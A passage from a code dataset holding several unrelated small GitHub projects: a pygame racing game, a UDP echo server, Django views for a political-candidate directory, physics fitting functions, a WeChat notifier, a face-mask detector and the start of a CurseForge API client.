pygame.mask.from_surface(trackMask)\r\n\r\n\r\n\r\nBLACK = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nWHITE = (0, 0, 0)\r\n\r\n\r\nloop = True\r\nwhile loop:\r\n \r\n clock.tick(60)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n loop = False\r\n \r\n \r\n screen.fill(BLACK)\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_w]:\r\n playerCar.Drive()\r\n if keys[pygame.K_a]:\r\n playerCar.turn(-5)\r\n if keys[pygame.K_d]:\r\n playerCar.turn(5)\r\n\r\n screen.blit(mask.to_surface(), (0, 0))\r\n playerCar.update(screen)\r\n \r\n if not mask.get_at((playerCar.position.x, playerCar.position.y)):\r\n print(\"you lose\")\r\n loop = False\r\n\r\n pygame.display.flip()","repo_name":"Floatable/Racing-Game","sub_path":"fishles/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6829391224","text":"import socket\n\n# Define the server's IP address and port\nSERVER_HOST = '0.0.0.0' # Listen on all available interfaces\nSERVER_PORT = 12345\n\n# Create a socket for the server\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserver_socket.bind((SERVER_HOST, SERVER_PORT))\n\nprint(\"Server is listening on\", SERVER_HOST, \"port\", SERVER_PORT)\n\nwhile True:\n # Receive data from the client\n data, client_address = server_socket.recvfrom(1024)\n print(\"Received from:\", client_address, \"Message:\", data.decode())\n\n # Send a response back to the client\n response = \"Server received your message: \" + data.decode()\n server_socket.sendto(response.encode(), client_address)\n","repo_name":"shaheen-senpai/S7DSLAB","sub_path":"Familarization/serverUDP.py","file_name":"serverUDP.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72862332212","text":"import tkinter as tk\n\n\nclass TrackPointGUI:\n x = 0\n y = 0\n\n is_valid = False\n\n def __init__(self, root):\n self.root = root\n\n self.x = self.root.cache_x\n self.y = self.root.cache_y\n\n self.var_x = tk.IntVar()\n self.var_y = tk.IntVar()\n self.var_x.set(self.x)\n self.var_y.set(self.y)\n\n self.window = tk.Toplevel(master=self.root.window)\n self.window.title(f\"Track\")\n\n self.frm_coord = tk.Frame(master=self.window)\n\n self.lbl_x = 
tk.Label(master=self.frm_coord, text=\"x: \")\n self.lbl_y = tk.Label(master=self.frm_coord, text=\"y: \")\n self.ent_x = tk.Entry(master=self.frm_coord, textvariable=self.var_x, width=10)\n self.ent_y = tk.Entry(master=self.frm_coord, textvariable=self.var_y, width=10)\n\n self.lbl_x.grid(row=0, column=0, padx=(5, 0), pady=10)\n self.ent_x.grid(row=0, column=1, padx=5, pady=10)\n self.lbl_y.grid(row=0, column=2, padx=(5, 0), pady=10)\n self.ent_y.grid(row=0, column=3, padx=5, pady=10)\n\n self.frm_coord.pack()\n\n self.frm_button = tk.Frame(master=self.window)\n\n self.btn_cancel = tk.Button(master=self.frm_button, text=\"Cancel\", command=self.cancel)\n self.btn_submit = tk.Button(master=self.frm_button, text=\"Submit\", command=self.submit)\n\n self.btn_cancel.pack(side=tk.LEFT, padx=5, pady=(0, 5))\n self.btn_submit.pack(side=tk.RIGHT, padx=5, pady=(0, 5))\n\n self.frm_button.pack()\n\n self.window.resizable(False, False)\n\n def cancel(self):\n self.window.destroy()\n\n def submit(self):\n if self.var_x.get() and self.var_y.get():\n self.is_valid = True\n self.x = self.var_x.get()\n self.y = self.var_y.get()\n else:\n self.is_valid = False\n\n self.window.destroy()\n","repo_name":"yaor42/Fringe-Analyzer","sub_path":"GUIs/TrackPointGUI.py","file_name":"TrackPointGUI.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"7364243920","text":"from django.shortcuts import render\nfrom django.http import Http404, HttpResponse, HttpResponseRedirect\nfrom django.views.generic import DetailView, CreateView,\\\n TemplateView, UpdateView,\\\n ListView, RedirectView\nfrom django.core.mail import send_mail\nfrom templated_email import send_templated_mail\nfrom django.contrib import messages\nfrom .models import Candidate, CandidateInvite, College, CandidateUpdate\nfrom political_sisterhood.issue.models import CandidateIssue\nfrom haystack.generic_views import SearchView as BaseFacetedSearchView\nfrom political_sisterhood.races.models import State, Race\nimport logging\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse\nfrom .forms import CandidateForm\nfrom political_sisterhood.search.forms import SearchForm\nfrom haystack.query import SearchQuerySet, EmptySearchQuerySet, SQ\nfrom haystack.inputs import AutoQuery\nimport urllib.parse as urlparse\nlogger = logging.getLogger(__name__)\n# Create your views here.\n\n\ndef sendingEmail(candidate, new_data):\n candidate = Candidate.objects.get(id=candidate)\n from django.core import serializers\n try:\n send_templated_mail(\n template_name='updated',\n from_email=\"Political Sisterhood \",\n recipient_list=['chris@politicalsisterhood.com',\n 'susan@politicalsisterhood.com'],\n context={\n 'name': candidate.full_name,\n 'url': candidate.get_absolute_url(),\n 'candidate': candidate,\n 'instance': new_data\n }\n )\n except Exception as e:\n logger.error(e)\n\n\nclass AllCandidates(BaseFacetedSearchView):\n template_name = \"candidate/all.html\"\n facet_fields= ['party']\n form_class = SearchForm\n paginate_by = 12\n paginate_orphans = 2\n\n # All CHANGES NEED TO BE DONE IN SEARCH/VIEWS AND CANDIDATE/VIEWS\n def get_queryset(self):\n queryset = SearchQuerySet().filter(active=True).order_by('first_name')\n # further filter queryset based on some set of criteria\n party = self.request.GET.getlist('party', '')\n party_or = \"\"\n college = self.request.GET.getlist('college', '')\n college_or = \"\"\n state = 
self.request.GET.getlist('state', '')\n state_or = \"\"\n issues = self.request.GET.getlist('issues', '')\n issues_or = \"\"\n race = self.request.GET.getlist('race', '')\n race_or = \"\"\n race_type = self.request.GET.getlist('race_type', '')\n race_type_or = \"\"\n women = self.request.GET.get('women', '')\n q = self.request.GET.get('q', '')\n page = self.request.GET.get('page', '')\n search = ''.join(party) + q + page\n if search == \"\":\n search = \"null\"\n if party:\n for facet in party:\n party_or += 'party: \"%s\"' % (facet)\n queryset = queryset.narrow(party_or)\n if college:\n for facet in college:\n college_or += 'college: \"%s\"' % (facet)\n queryset = queryset.narrow(college_or)\n if state:\n for facet in state:\n state_or += 'state: \"%s\"' % (facet)\n queryset = queryset.narrow(state_or)\n if issues:\n for facet in issues:\n issues_or += 'issues: \"%s\"' % (facet)\n queryset = queryset.narrow(issues_or)\n if race:\n for facet in race:\n race_or += 'race: \"%s\"' % (facet)\n queryset = queryset.narrow(race_or)\n if race_type:\n for facet in race_type:\n race_type_or += 'race_type: \"%s\"' % (facet)\n queryset = queryset.narrow(race_type_or)\n if q:\n queryset = queryset.filter(SQ(text=AutoQuery(q))|SQ(title=AutoQuery(q)))\n if women:\n queryset = queryset.filter(women=True)\n return queryset\n\n def form_valid(self, form):\n context = self.get_context_data(**{\n self.form_name: form,\n 'object_list': self.get_queryset()\n })\n return self.render_to_response(context)\n\n def form_invalid(self, form):\n context = self.get_context_data(**{\n self.form_name: form,\n 'object_list': self.get_queryset()\n })\n return self.render_to_response(context)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['query'] = self.request.GET.get('q','')\n context['party'] = self.request.GET.getlist('party', '')\n context['college'] = self.request.GET.getlist('college', '')\n context['state'] = self.request.GET.getlist('state', '')\n context['issues'] = self.request.GET.getlist('issues', '')\n women = self.request.GET.get('women', '')\n if women == True or women == 'on':\n context['women'] = True\n context['race_type'] = self.request.GET.getlist('race_type', '')\n return context\n\n\nclass CandidateView(DetailView):\n model = Candidate\n template_name = \"candidate/detail.html\"\n\n def dispatch(self, *args, **kwargs):\n user = self.request.user.is_authenticated\n if 'visited' in self.request.session:\n visits = self.request.session['visited']\n else:\n visits = None\n if not user:\n if visits and len(visits) > 3:\n return redirect(reverse('candidate:paywall'))\n visited = []\n candidate = self.get_object().id\n if visits:\n visited.extend(visits)\n if not candidate in visits:\n visited.append(candidate)\n else:\n visited.append(candidate)\n self.request.session['visited'] = visited\n return super().dispatch(*args, **kwargs)\n\n def get_object(self):\n slug = self.kwargs['slug']\n candidate = Candidate.objects.get(slug=slug)\n return candidate\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['approved'] = False\n if self.request.GET.get('approved') == 'pending':\n context['approved'] = True\n elif self.get_object().approved:\n context['approved'] = True\n return context\n\n\nclass StateListView(ListView):\n model = Candidate\n template_name = \"state/list.html\"\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n state 
=State.objects.get(state=self.kwargs['state'].upper())\n data['object'] = state\n return data\n\n def get_queryset(self):\n state = Candidate.objects.filter(state=self.kwargs['state'])\n return state\n\n\nclass UpdateCandidateInvite(UpdateView):\n # specify a custom ModelForm\n form_class = CandidateForm\n template_name = \"candidate/update.html\"\n\n def get_object(self, queryset=None):\n # get the existing object or created a new one\n candidate = get_object_or_404(CandidateInvite, md5_email=self.kwargs['hash'])\n if candidate.candidate:\n obj = Candidate.objects.get(id=candidate.candidate.id)\n CandidateInvite.objects.filter(md5_email=self.kwargs['hash']).update(candidate=obj)\n else:\n obj = None\n return obj\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n data['contact'] = CandidateInvite.objects.get(md5_email=self.kwargs['hash'])\n return data\n\n def form_valid(self, form):\n instance = form.save(commit=False)\n try:\n sendingEmail(instance.id, instance)\n except Exception as e:\n logger.error(e)\n instance.save()\n try:\n CandidateInvite.objects.filter(md5_email=self.kwargs['hash']).update(used=True)\n issue1, create = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue1'),\n desc=form.cleaned_data.get('issue1_detail'))\n issue2, created = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue2'),\n desc=form.cleaned_data.get('issue2_detail'))\n issue3, created = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue3'),\n desc=form.cleaned_data.get('issue3_detail'))\n college, create = College.objects.get_or_create(name=form.cleaned_data['college_free'])\n Candidate.objects.filter(id=instance.id).update(issue1=issue1.issue_num,\n issue2=issue2.issue_num,\n issue3=issue3.issue_num,\n race_name=form.cleaned_data.get('race_name'),\n college=college, approval=\"Pending\")\n try:\n CandidateUpdate.objects.create(email=form.cleaned_data.get('update_email'),\n first_name=form.cleaned_data.get('update_first_name'),\n last_name=form.cleaned_data.get('update_last_name'),\n note=form.cleaned_data.get('update_note', ''),\n candidate=instance)\n except Exception as e:\n logger.error(e)\n except Exception as e:\n logger.error(e)\n\n return redirect(Candidate.objects.get(id=instance.id).get_absolute_url() + \"?approved=pending\")\n\n\nclass CreateCandidate(CreateView):\n form_class = CandidateForm\n template_name = \"candidate/create.html\"\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n data['referral'] = self.request.GET.get('ref', '')\n return data\n\n def form_valid(self, form):\n instance = form.save(commit=True)\n try:\n ref = self.request.GET.get('ref', '')\n issue1, create = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue1'),\n desc=form.cleaned_data.get('issue1_detail'))\n issue2, created = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue2'),\n desc=form.cleaned_data.get('issue2_detail'))\n issue3, created = CandidateIssue.objects.get_or_create(candidate=instance,\n issue=form.cleaned_data.get('issue3'),\n desc=form.cleaned_data.get('issue3_detail'))\n college, create = College.objects.get_or_create(name=form.cleaned_data['college_free'])\n Candidate.objects.filter(id=instance.id).update(issue1=issue1.issue_num,\n issue2=issue2.issue_num,\n issue3=issue3.issue_num,\n college=college,\n 
approval=\"Pending\",\n race_name=form.cleaned_data.get('race_name'),\n referral=ref)\n try:\n CandidateUpdate.objects.create(email=form.cleaned_data.get('update_email'),\n first_name=form.cleaned_data.get('update_first_name'),\n last_name=form.cleaned_data.get('update_last_name'),\n note=form.cleaned_data.get('update_note', ''),\n candidate=instance)\n except Exception as e:\n logger.warning(e)\n except Exception as e:\n logger.error(e)\n\n try:\n sendingEmail(instance.id)\n\n except Exception as e:\n logger.error(e)\n\n return redirect(Candidate.objects.get(id=instance.id).get_absolute_url() + \"?approved=pending\")\n\n\nclass CandidatePricing(TemplateView):\n template_name = \"candidate/pricing.html\"\n\n\nclass CandidatePaywall(TemplateView):\n template_name = \"candidate/paywall.html\"\n\n\ndef CandidateIssueReport(request):\n name = request.POST.get('name', '')\n email = request.POST.get('email', '')\n other = request.POST.get('other', '')\n issue = request.POST.get('issue', '')\n candidate = request.POST.get('candidate', '')\n return_slug = request.POST.get('return', '')\n captcha = request.POST.get('g-recaptcha', '')\n if captcha:\n subject = '[CANDIDATE ISSUE] Issue on {}'.format(candidate)\n body = 'NAME: %s\\n\\nEMAIL: %s\\n\\nISSUE: %s\\n\\nMESSAGE: %s' % (name, email, issue, other)\n from_email = 'info@politicalsisterhood.com'\n recipients = [\n 'chris@politicalsisterhood.com',\n 'susan@politicalsisterhood.com',\n ]\n send_mail(subject, body, from_email, recipients)\n messages.success(request, 'We appreciate your feedback!')\n return HttpResponseRedirect(return_slug)\n else:\n messages.warning(request, 'Please fill out captcha')\n return HttpResponseRedirect(return_slug)","repo_name":"2019politicalsisterhood/2019Candidates","sub_path":"political_sisterhood/candidate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35865307630","text":"import json\n\n\nclass Iterator_coutry:\n\n def __init__(self, path):\n self.start = -1\n self.path = path\n with open('countries.json', encoding='utf8') as file:\n self.data = json.load(file)\n self.file = open(path, 'w', encoding='utf8')\n\n def __iter__(self):\n return self\n\n def __next__(self):\n self.start += 1\n if self.start >= len(self.data):\n self.file.close()\n raise StopIteration\n country_name = self.data[self.start]['name']['official']\n pair = country_name + ' - ' + 'https://en.wikipedia.org/wiki/' + country_name.replace(' ', '_')\n to_write = str(pair)\n self.file.write(f'{to_write}\\n')\n\n\nif __name__ == '__main__':\n country_list = Iterator_coutry('pair.txt')\n for item in country_list:\n next(country_list)\n","repo_name":"shattl2000/Netology","sub_path":"Python_course/Part 2/Lesson 2/Iterator_country.py","file_name":"Iterator_country.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12155612655","text":"# Write your code here\nfilename: str = 'flowers.txt'\n\n# HINT: create a dictionary from flowers.txt\nflower_dict = {}\nwith open(filename, 'r') as f:\n while True:\n line = f.readline()\n if not line:\n break\n parts = [x.strip() for x in str.split(line, ':')]\n flower_dict[parts[0].upper()] = parts[1]\n\n# HINT: create a function to ask for user's first and last name\ndef get_name():\n full_name = input(\"Enter your First [space] Last name only: \")\n return full_name\n\n# print the 
desired output\nname: str = get_name()\nprint(f'Unique flower name with the first letter: {flower_dict[name[0].upper()]}')\n\n","repo_name":"surishashank/learning","sub_path":"ai_programming_with_python/05_practice.py","file_name":"05_practice.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27041771555","text":"import cv2\nimport numpy as np\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nimport os\n\ndef detect_face(frame, faceNet):\n\t(h, w) = frame.shape[:2]\n\tblob = cv2.dnn.blobFromImage(frame, 1.0, (224, 224), (110, 170, 120))\n\t\n\t# set the input to the pre-trained deep learning network and obtain\n\t# the output predicted probabilities for each of the classes.\n\tfaceNet.setInput(blob)\n\tdetections = faceNet.forward()\n\n\tfaces = []\n\tlocs = []\n\n\t# Looping over all the face detected.\n\tfor i in range(0, detections.shape[2]):\n\t\t# confidence associated with the detection\n\t\tconfidence = detections[0, 0, i, 2]\n\n\t\tif(confidence > 0.5):\n\t\t\t# Bounding box for the face\n\t\t\tbox = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n\t\t\t(startX, startY, endX, endY) = box.astype(\"int\")\n\n\t\t\t# To ensure that the bounding box is within the dimensions \n\t\t\t# of the frame.\n\t\t\t(startX, startY) = (max(0, startX), max(0, startY))\n\t\t\t(endX, endY) = (min(w - 1, endX), min(h - 1, endY))\n\t\t\t\n\t\t\t# ROI\n\t\t\tface = frame[startY:endY, startX:endX]\n\t\t\tcv2.imshow(\"Face\", face)\n\t\t\tif(len(face)>0):\n\t\t\t\t# Since, cv2 reads the frame in BGR format, coverting\n\t\t\t\t# it into RGB\n\t\t\t\tface = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\n\t\t\t\tface = cv2.resize(face, (224, 224))\n\t\t\t\tface = img_to_array(face)\n\t\t\t\tface = preprocess_input(face)\n\t\t\t\t# Appending the face abd bbox in to their respective lists.\n\t\t\t\tfaces.append(face)\n\t\t\t\tlocs.append((startX, startY, endX, endY))\n\n\treturn (locs, faces)\n\ndef predict(faces, maskNet):\n\tpreds = []\n\tif(len(faces) > 0):\n\t\t# Making predictions in batches for faster inference\n\t\tfaces = np.array(faces, dtype=\"float32\")\n\t\tpreds = maskNet.predict(faces, batch_size=16)\n\n\treturn preds\n\nif __name__==\"__main__\":\n\t# Loading face detection model.\n\tprint(\"[INFO] Loading face detector model...\")\n\t# prototxtPath = r\"face_detector\\deploy.prototxt\"\n\tprototxtPath = os.path.join(\"face_detector\", \"deploy.prototxt\")\n\t# weightsPath = r\"face_detector\\res10_300x300_ssd_iter_140000.caffemodel\"\n\tweightsPath = os.path.join(\"face_detector\", \"res10_300x300_ssd_iter_140000.caffemodel\")\n\tfaceNet = cv2.dnn.readNet(prototxtPath, weightsPath)\n\n\t# Loading the face mask trained model.\n\tprint(\"[INFO] Loading face mask detector model...\")\n\tmaskNet = load_model(\"mask_detector.model\")\n\n\t# Starting videostream\n\tprint(\"[INFO] Starting video stream...\")\n\tcap = cv2.VideoCapture(0)\n\n\twhile(1):\n\t\tret, frame = cap.read()\n\t\t(locs, faces) = detect_face(frame, faceNet)\n\t\tpreds = predict(faces, maskNet)\n\n\t\t# Loop over the detected faces and their corresponding locations\n\t\tfor (box, pred) in zip(locs, preds):\n\t\t\t(startX, startY, endX, endY) = box\n\t\t\t(mask, withoutMask) = pred\n\n\t\t\t# Determine the resultant class and display its probability\n\t\t\tif(mask > withoutMask):\n\t\t\t\tlabel = \"{}: 
{:.2f}%\".format(\"Mask\", max(mask, withoutMask) * 100)\n\t\t\t\tcolor = (0, 255, 0)\n\t\t\telse:\n\t\t\t\tlabel = \"{}: {:.2f}%\".format(\"No Mask\", max(mask, withoutMask) * 100)\n\t\t\t\tcolor = (0, 0, 255)\n\t\n\t\t\t# display the label and bounding box rectangle on the output\n\t\t\t# frame\n\t\t\tcv2.putText(frame, label, (startX, startY - 10),\n\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\t\t\tcv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)\n\n\t\t# Total number of faces detected in the frame.\n\t\tcv2.putText(frame, \"Total no. of face detected: {0}\".format(len(locs)), \n\t\t\t(20, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 2)\t\n\n\t\t# Output Frame\n\t\tcv2.imshow(\"Frame\", frame)\n\t\tif(cv2.waitKey(1) & 0xFF == ord('q')):\n\t\t\tbreak\n\n\tcv2.destroyAllWindows()","repo_name":"sayantann11/face-mask-dectection","sub_path":"detect_face.py","file_name":"detect_face.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2818426377","text":"num_shops = int(input())\nshop_costs = sorted(map(int, input().split()))\nnum_days = int(input())\n\nsol = list()\n\nfor d in range(num_days):\n today_money = int(input())\n lo = -1\n hi = len(shop_costs)\n while lo + 1 < hi:\n mid = int((lo + hi) / 2)\n if shop_costs[mid] <= today_money: lo = mid\n else: hi = mid\n sol += f\"{lo + 1}\"\n sol += \"\\n\"\nprint(\"\".join(sol[:-1]))\n","repo_name":"akashkw/practice","sub_path":"python/codeforces/interesting_drink/interesting_drink.py","file_name":"interesting_drink.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35865178510","text":"import json\nfrom pprint import pprint\n\n\ndef count_10_word_in_json():\n from collections import Counter\n with open(\"newsafr.json\", encoding=\"utf-8\") as datafile:\n json_data = json.load(datafile)\n json_items = json_data[\"rss\"][\"channel\"][\"items\"]\n\n descriptions = []\n\n for i in json_items:\n descriptions.append(i[\"description\"].split())\n\n format_description = []\n\n for elem in sum(descriptions, []):\n if len(elem) > 6:\n format_description.append(elem.lower())\n\n def sortByLength(inputStr):\n return len(inputStr)\n\n format_description.sort(key=sortByLength, reverse=True)\n\n Counter = Counter(format_description)\n words = Counter.most_common(10)\n for word in words:\n pprint(f\"Слово: '{word[0]}' встречается: {word[1]} раз\")\n\n\ncount_10_word_in_json()\n","repo_name":"shattl2000/Netology","sub_path":"Python_course/Part 1/Lesson 10/news_json.py","file_name":"news_json.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15074303007","text":"from turtle import Turtle\nimport random\n\n\nclass Wall(Turtle):\n\n def __init__(self):\n super().__init__()\n self.color(\"orange\")\n self.shape(\"square\")\n self.shapesize(stretch_wid=1, stretch_len=5)\n self.penup()\n","repo_name":"yangpu2007360/breakout_game","sub_path":"wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74180066931","text":"import math\nimport matplotlib.pyplot as plt\n\n# e stands for epsilon = COR\n## --- LSD Analytical Solution for gamma() -------------------------------------\n\ndef RootByBisection(a, b, tol, 
maxiter, coefficient_of_restitution):\n\n if coefficient_of_restitution < 0.001 :\n coefficient_of_restitution = 0.001\n\n if coefficient_of_restitution > 0.999 :\n return 0.0\n k=0\n gamma = 0.5 * (a + b)\n\n while b - a > tol and k <= maxiter:\n coefficient_of_restitution_trial = coeff_of_rest_diff(gamma, coefficient_of_restitution)\n\n if coeff_of_rest_diff(a, coefficient_of_restitution) * coefficient_of_restitution_trial < 0:\n b = gamma\n\n elif coefficient_of_restitution_trial == 0:\n return gamma\n\n else:\n a = gamma\n\n gamma = 0.5 * (a + b)\n k += 1\n\n return gamma\n\n# function below from Thornton\n\ndef coeff_of_rest_diff(gamma, desired_coefficient_of_restit):\n\n if gamma <= 1.0/math.sqrt(2.0) :\n return math.exp(-gamma/math.sqrt(1.0-gamma*gamma)*(math.pi-math.atan(2.0*gamma*math.sqrt(1.0-gamma*gamma)/(-2.0*gamma*gamma+1.0))))-desired_coefficient_of_restit\n elif gamma < 1.0 :\n return math.exp(-gamma/math.sqrt(1.0-gamma*gamma)*math.atan(2.0*gamma*math.sqrt(1.0-gamma*gamma)/(2.0*gamma*gamma-1.0)))-desired_coefficient_of_restit\n elif gamma == 1.0 :\n return 0.135335283 - desired_coefficient_of_restit\n else:\n return math.exp(-gamma/math.sqrt(gamma*gamma-1.0)*math.log((gamma/math.sqrt(gamma*gamma-1.0)+1.0)/(gamma/math.sqrt(gamma*gamma-1.0)-1.0)))-desired_coefficient_of_restit\n\n## --------------------------------------------------------------------------------\n\n\n## ------------- HMD fitting curves by Thornton -----------------------------------\ndef GammaForHertzThornton(e):\n if e < 0.001:\n e = 0.001\n\n if e > 0.999:\n return 0.0\n\n h1 = -6.918798\n h2 = -16.41105\n h3 = 146.8049\n h4 = -796.4559\n h5 = 2928.711\n h6 = -7206.864\n h7 = 11494.29\n h8 = -11342.18\n h9 = 6276.757\n h10 = -1489.915\n\n alpha = e * (h1 + e * (h2 + e * (h3 + e * (h4 + e * (h5 + e * (h6 + e * (h7 + e *(h8 + e * (h9 + e * h10)))))))))\n\n return math.sqrt(1.0/(1.0 - (1.0+e)*(1.0+e) * math.exp(alpha)) - 1.0)\n## --------------------------------------------------------------------------------\n\n\n## ------------- LSD fitting curves by Thornton -----------------------------------\ndef GammaForLSDbyThorntonFittings(e):\n\n if e < 0.001:\n e = 0.001\n\n if e > 0.999:\n return 0.0\n\n h_1 = 0.2446517\n h_2 = -0.5433478\n h_3 = 0.9280126\n h_4 = -1.5897793\n h_5 = 1.2102729\n h_6 = 3.3815393\n h_7 = 6.3814014\n h_8 = -34.482428\n h_9 = 25.672467\n h_10 = 94.396267\n\n beta = e - 0.5\n\n xi = (h_1 + beta * (h_2 + beta * (h_3 + beta * (h_4 + beta * (h_5 + beta * (\n h_6 + beta * (h_7 + beta * (h_8 + beta * (h_9 + beta * (beta * h_10))))))))))\n\n\n zeta = e * (1 - e)**2 * xi\n\n return zeta\n\n'''\ncor = [i/100 for i in range(1,100)]\ngamma_hmd_fitted = [GammaForHertzThornton(i) for i in cor]\ngamma_lsd_analytical = [RootByBisection(0.0, 16.0, 0.0001, 300, i) for i in cor]\ngamma_lsd_fitted = [GammaForLSDbyThorntonFittings(i) for i in cor]\n\norange = (227 / 255, 114 / 255, 34 / 255)\n#plt.plot(cor, gamma_lsd_analytical, color=(0 / 255, 101 / 255, 189 / 255), label=\"Zeta Analytical\")\n\nplt.plot(cor, gamma_hmd_fitted, color=orange, label=\"Zeta Fitted for HMD\")\n#plt.plot(cor, gamma_lsd_analytical, color=(0 / 255, 101 / 255, 189 / 255), label=\"Zeta Analytical LSD\")\nplt.legend()\n#plt.grid()\nplt.ylabel('Dashpot Coefficient $\\zeta$ [-]')\nplt.xlabel('Coefficient of Restitution $\\epsilon$ [-]')\nplt.savefig('C:/Users/Jaist/Desktop/plots/' + 'zeta_cor_hmd_lsd' + '.pdf')\nplt.show()\n\n\nlabel=\"Zeta Fitted by Thornton 
\"\n'''","repo_name":"benediktjaist/BA_DEM","sub_path":"GUI/test_cor.py","file_name":"test_cor.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20759219887","text":"import requests\nimport ast\nimport json\nfrom config import wechat_conf\nimport simplejson\nclass WeChat(object):\n\n def __init__(self):\n self.corpid = wechat_conf[\"corpid\"]\n self.corpsecret = wechat_conf[\"corpsecret\"]\n self.party = wechat_conf[\"party\"]\n self.agentid = wechat_conf[\"agentid\"]\n self.token_url = wechat_conf[\"token_url\"]\n self.msg_url = wechat_conf[\"msg_url\"]\n\n def send(self, subject, msg, url):\n msg = self.normalize(msg)\n payload = {\n \"touser\": \"\",\n \"toparty\": self.party,\n \"msgtype\": \"news\",\n \"agentid\": self.agentid,\n \"news\": {\n \"articles\":\n [\n {\n \"title\": subject,\n \"description\": msg,\n \"url\": url,\n \"picurl\": \"\"\n }\n ]\n },\n \"safe\": \"0\"\n }\n\n r = requests.post(self.msg_url + \"?access_token=\" + self.get_token(),\n data=simplejson.dumps(payload, ensure_ascii=False).encode('utf8'),\n headers={'Content-type':'application/json', 'charset': 'utf-8'})\n return r\n\n def get_token(self):\n payload = {\n \"corpid\": self.corpid,\n \"corpsecret\": self.corpsecret\n }\n r = requests.get(self.token_url, params=payload)\n data = ast.literal_eval(r.text)\n return data[\"access_token\"]\n\n def normalize(self, broker_message):\n msg = broker_message\n return msg\n","repo_name":"flyyang/medical-news","sub_path":"wechat.py","file_name":"wechat.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"21"} +{"seq_id":"72249603253","text":"import requests\nimport os\n\nfrom bs4 import BeautifulSoup\nfrom zipfile import ZipFile\nfrom json import loads, dumps\nfrom pathlib import Path\nfrom urllib.parse import unquote\nfrom sys import stdout\nfrom API.MultiMC import InstanceCfg, ForgePatch\nfrom shutil import copytree, rmtree\n\nfrom Utils.Utils import moveTree\nfrom GUI.Strings import Strings\nfrom CurseMetaDB.DB import DB\n\nuseUserAgent = \"Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0\"\n\nstrings = Strings()\ntranslate = strings.get\n\n\nclass CurseAPI:\n \"\"\"Curse API\"\"\"\n\n motd = \"\"\"\n _|_| _| _| _| _|\n _| _| _|_| _|_| _|_| _|_|\n _| _| _| _| _| _| _| _|\n _| _| _| _| _| _|\n _|_| _| _| _| _|\n \"\"\"\n\n version = \"2.1.5\"\n baseUrl = \"https://mods.curse.com\"\n forgeUrl = \"https://minecraft.curseforge.com\"\n\n def __init__(self, db: DB):\n self.db = db\n\n # Set User Agent header for extra sneakyness\n self.session = requests.Session()\n self.session.headers.update({\"User-Agent\": useUserAgent})\n\n # SECTION MODS\n\n def get_mod_list(self, version=\"*\"):\n \"\"\"Get an array of `CurseProject`s\"\"\"\n mods = self.db.get_popular(\"mod\", 25, version)\n return [self.get_project(i) for i in mods]\n\n def get_project(self, pid: int):\n mod = self.db.get_project(pid)\n if not mod:\n return False\n return CurseProject(mod)\n\n def get_file(self, fid: int):\n file = self.db.get_file(fid)\n if not file:\n return False\n return CurseFile(file)\n\n # END SECTION\n\n # SECTION MODPACKS\n\n def get_modpacks(self, version=\"*\"):\n packs = self.db.get_popular(\"modpack\", 25, version)\n return [CurseProject(self.db.get_project(i)) for i in packs]\n\n # END SECTION\n\n # SECTION UTILS\n\n def search(self, query: str, ptype=\"mod\", 
